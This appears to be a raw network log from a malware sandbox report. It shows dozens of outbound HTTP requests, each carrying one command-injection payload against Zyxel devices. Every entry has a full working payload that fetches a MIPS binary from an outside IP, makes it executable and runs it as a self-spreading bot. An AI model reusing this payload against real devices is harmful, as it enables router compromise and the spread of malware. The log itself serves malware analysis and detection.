                                        Jan 14, 2024 16:18:14.028831005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        337192.168.2.1333628182.211.57.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028872013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        338192.168.2.133896638.98.134.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028934002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        339192.168.2.134238491.66.160.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028985023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        340192.168.2.135223869.245.35.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.029037952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        341192.168.2.134738480.135.72.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.029078960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        342192.168.2.1350814168.32.112.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.029112101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        343192.168.2.135598443.233.255.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.029156923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        344192.168.2.134328462.170.158.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.029169083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        345192.168.2.1336980168.103.220.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.029225111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        346192.168.2.134072053.155.217.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.029258013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        347192.168.2.13562688.21.89.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.029321909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        348192.168.2.1354556203.72.182.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.029344082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        349192.168.2.1346816142.14.186.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.029378891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        350192.168.2.1351270202.133.199.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.029417038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        351192.168.2.1360190102.108.21.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.029460907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        352192.168.2.1360460115.115.115.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.029517889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        353192.168.2.1348614121.136.142.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.029544115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        354192.168.2.1355638135.104.132.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.030073881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        355192.168.2.133824231.193.153.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:15.034435987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        356192.168.2.1334840156.3.172.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:15.034480095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        357192.168.2.1336884128.226.24.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:15.034523010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        358192.168.2.1348730174.211.101.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:15.034625053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        359192.168.2.1355968121.52.110.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:15.034686089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        360192.168.2.135285248.136.134.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:15.034720898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        361192.168.2.134383431.193.246.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:16.040158033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        362192.168.2.1359654219.118.35.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:16.040220976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        363192.168.2.1349604166.43.94.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:16.040273905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        364192.168.2.1333784157.142.58.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:17.046266079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        365192.168.2.1338482208.53.219.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:17.046356916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        366192.168.2.1355398184.110.232.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:17.046387911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        367192.168.2.1352758121.49.227.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:19.057118893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        368192.168.2.134939441.94.76.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:20.061258078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        369192.168.2.1355420156.48.212.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:20.061319113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        370192.168.2.1358228116.17.67.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:20.061331034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        371192.168.2.1349854217.49.212.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:20.061372995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        372192.168.2.134718640.53.127.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:20.061399937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        373192.168.2.1354622109.33.1.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:20.061480999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        374192.168.2.1356128136.185.159.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:20.061482906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        375192.168.2.1348668188.64.214.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:20.061489105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        376192.168.2.134915075.50.50.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:20.061527967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        377192.168.2.1357702159.239.97.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:20.061594963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        378192.168.2.1350414103.192.143.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:20.061625957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        379192.168.2.1343158131.176.32.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:20.061660051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        380192.168.2.136091279.116.163.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:20.061691999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        381192.168.2.1340042151.174.57.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:20.061727047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        382192.168.2.1351228212.210.89.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:20.061851025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        383192.168.2.134056677.67.198.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.065609932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        384192.168.2.1333092162.119.13.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.065654039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        385192.168.2.1345200175.189.77.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.065687895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        386192.168.2.1360356184.231.76.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.065747976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        387192.168.2.134836860.137.163.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.066004038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        388192.168.2.1336352180.91.12.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.066056967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        389192.168.2.135485253.177.245.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.066103935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        390192.168.2.133544478.160.130.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.066143990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        391192.168.2.134937213.109.17.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.066160917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        392192.168.2.1346960138.171.93.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.066186905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        393192.168.2.1337182123.180.154.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.066332102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        394192.168.2.1356148184.173.161.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.066411018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        395192.168.2.1337982131.52.237.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.066448927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        396192.168.2.1353724139.168.186.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.066533089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        397192.168.2.1355648145.161.44.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.066653013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        398192.168.2.1340298218.19.38.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:21.066728115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        399192.168.2.1357092161.155.76.132443
                                        TimestampBytes transferredDirectionData
